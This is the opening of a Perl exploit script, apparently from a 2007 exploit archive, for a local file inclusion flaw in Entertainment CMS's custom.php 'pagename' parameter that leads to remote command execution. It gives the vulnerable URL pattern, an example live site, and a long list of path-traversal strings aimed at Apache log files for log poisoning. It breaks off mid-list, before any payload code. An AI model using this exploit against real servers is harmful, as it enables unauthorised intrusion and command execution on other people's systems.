1 #!/usr/bin/perl
2 #
3 # Entertainment CMS Remote Command Execution Exploit
4 # Download: http://rapidshare.com/files/39640099/enter−cms.rar
5 #
6 # Exploit: http://site.com/[path]/custom.php?pagename=[Local File Inclusion];
7 # Example: http://multimedia.mydlstore.net/custom.php?pagename=teeeeeeeeeeee
8 #
9 # RST WAS MOVED TO RSTZONE.ORG !
10 #
11 # Another bug: Entertainment CMS Admin Login Bypass => http://securityreason.com/securityalert/2878
12 #
13 # Coded by Kw3rLn from Romanian Security Team a.K.A http://RSTZONE.ORG
14 # Contact: office@rstzone.org
15 #
16
17
18 use IO::Socket;
19 use LWP::Simple;
20
21 #ripped from rgod
22 @apache=(
23 "../../../../../var/log/httpd/access_log",
24 "../../../../../var/log/httpd/error_log",
25 "../apache/logs/error.log",
26 "../apache/logs/access.log",
27 "../../apache/logs/error.log",
28 "../../apache/logs/access.log",
29 "../../../apache/logs/error.log",
30 "../../../apache/logs/access.log",
31 "../../../../apache/logs/error.log",
32 "../../../../apache/logs/access.log",
33 "../../../../../apache/logs/error.log",
34 "../../../../../apache/logs/access.log",
35 "../logs/error.log",
36 "../logs/access.log",
37 "../../logs/error.log",
38 "../../logs/access.log",
39 "../../../logs/error.log",
40 "../../../logs/access.log",
41 "../../../../logs/error.log",
42 "../../../../logs/access.log",
43 "../../../../../logs/error.log",
44 "../../../../../logs/access.log",
45 "../../../../../etc/httpd/logs/access_log",
46 "../../../../../etc/httpd/logs/access.log",
47 "../../../../../etc/httpd/logs/error_log",
48 "../../../../../etc/httpd/logs/error.log",
49 "../../.. /../../var/www/logs/access_log",
50 "../../../../../var/www/logs/access.log",
51 "../../../../../usr/local/apache/logs/access_log",
52 "../../../../../usr/local/apache/logs/access.log",
Page 1/3
Entertainment CMS Local Inclusion Remote Command Execution Exploit
Kw3[R]Ln
07/24/2007
53 "../../../../../var/log/apache/access_log",
54 "../../../../../var/log/apache/access.log",
55 "../../../../../var/log/access_l